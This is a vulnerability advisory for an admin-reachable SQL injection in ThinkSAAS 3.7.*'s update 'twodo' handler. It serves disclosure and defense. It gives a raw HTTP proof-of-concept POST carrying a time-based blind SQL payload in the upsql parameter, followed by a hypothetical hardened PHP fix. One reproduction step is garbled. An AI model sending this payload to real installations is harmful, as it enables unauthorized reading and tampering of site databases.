ThinkSAAS is a lightweight open source community system that can be used to build vertical networks.
ThinkSAAS is a simple, highly scalable community development system.
ThinkSAAS can help you quickly develop and build a unique communication community.
GitHub address: https://github.com/thinksaas/ThinkSAAS
There is an SQL injection vulnerability in ThinkSAAS version 3.7.*. This vulnerability allows attackers to manipulate the application's database through specially crafted SQL query strings. Because user input is not sufficiently verified, attackers can insert malicious SQL code into input fields, thereby bypassing authentication, accessing or modifying sensitive data in the database, and even performing database management operations.
In the file thinksaas\app\system\action\update.php, in the twodo branch, the submitted SQL is passed straight to $db->query($item);
Following this into thinksaas\thinksaas\mysqli.php, the statement is handed to the database driver as-is, with no validation, so the attacker-supplied SQL command is executed directly.
POST /index.php?app=system&ac=update&ts=twodo HTTP/1.1
Host: www.thinksaas.eek
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://www.thinksaas.eek/index.php?app=system
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1718963392,1719036380,1719038907; ts_email=admin%40admin.com; ts_autologin=r8c8fpaaho0scsswkocosokcgsgcs84; PHPSESSID=l801643rf88v9fvl6ka866nlk0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
upsql=SELECT if(ASCII(SUBSTRING((SELECT DATABASE()),1,1)) = 116 ,sleep(3),0);
Reproduction steps:
1. Log in to the backend as an administrator.
2. Generate the target folder databse in the root directory.
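The defect described above is that the twodo branch takes the SQL text itself from the POST parameter upsql and passes it to $db->query($item). Since the page's own reproduction steps require an administrator session, the practical risk is an admin-only injection (and, because the request is a plain form POST, one a logged-in admin could be driven into by a cross-site request). The following is an added example of a hardened twodo step, written for this advisory and not taken from the ThinkSAAS code base. Everything in it is assumed: the upgrade/<version>.sql layout, the $session['csrf'] token, the runTwodo and loadUpgradeStatements names, and the allowlist of statement prefixes. The one thing it keeps from the page is the $db->query(string) call; the difference is that only statements read from a release-shipped file ever reach it.

```php
<?php
// Added example, not ThinkSAAS code. Hypothetical hardened "twodo" step:
// the upgrade SQL comes from a version-pinned file shipped with the release,
// never from the request body, so $db->query() only ever sees release SQL.

declare(strict_types=1);

// Assumed layout: upgrade scripts ship with the release in this directory.
const UPGRADE_DIR = __DIR__ . '/upgrade';

// Statement kinds a schema upgrade legitimately needs (assumed allowlist);
// anything else in the file is treated as a packaging error and refused.
const ALLOWED_PREFIXES = ['ALTER TABLE', 'CREATE TABLE', 'CREATE INDEX', 'INSERT INTO', 'UPDATE '];

/**
 * Read and vet the upgrade statements for one target version.
 * The version string is the only caller-influenced value, so it is pinned
 * to a strict shape that cannot reach outside UPGRADE_DIR.
 */
function loadUpgradeStatements(string $targetVersion): array
{
    if (!preg_match('/^\d+\.\d+\.\d+$/', $targetVersion)) {
        throw new InvalidArgumentException('bad version string');
    }
    $path = UPGRADE_DIR . '/' . $targetVersion . '.sql';
    $sql  = @file_get_contents($path);
    if ($sql === false) {
        throw new RuntimeException('no upgrade script for ' . $targetVersion);
    }

    $statements = [];
    foreach (explode(";\n", $sql) as $stmt) {
        $stmt = trim($stmt);
        if ($stmt === '' || str_starts_with($stmt, '--')) {
            continue; // blank line or SQL comment
        }
        $upper   = strtoupper($stmt);
        $allowed = false;
        foreach (ALLOWED_PREFIXES as $prefix) {
            if (str_starts_with($upper, $prefix)) {
                $allowed = true;
                break;
            }
        }
        if (!$allowed) {
            throw new RuntimeException('refusing non-schema statement: ' . substr($stmt, 0, 40));
        }
        $statements[] = $stmt;
    }
    return $statements;
}

/**
 * Hypothetical replacement for the twodo branch. $db is assumed to expose
 * query(string), as in the page's $db->query($item); $session['csrf'] is
 * assumed to have been issued when the update page was rendered.
 * Returns the number of statements executed.
 */
function runTwodo(object $db, array $post, array $session, string $targetVersion): int
{
    // The original reads the SQL from $post['upsql']. Here the request may
    // only carry a CSRF token; it cannot influence which SQL runs.
    if (!isset($post['token'], $session['csrf'])
        || !hash_equals($session['csrf'], (string) $post['token'])) {
        throw new RuntimeException('CSRF token mismatch');
    }

    $count = 0;
    foreach (loadUpgradeStatements($targetVersion) as $stmt) {
        $db->query($stmt); // same call as before, but release SQL only
        $count++;
    }
    return $count;
}
```

With this shape the page's payload (a SELECT ... sleep(3) in upsql) has no path into the query: the upsql parameter is simply never read, the version string cannot select a file outside the upgrade directory, and a tampered or mis-packaged upgrade file that contains a SELECT or DROP is rejected before anything runs. The prefix allowlist is defense in depth, not the fix; the fix is that the SQL source is no longer the HTTP request.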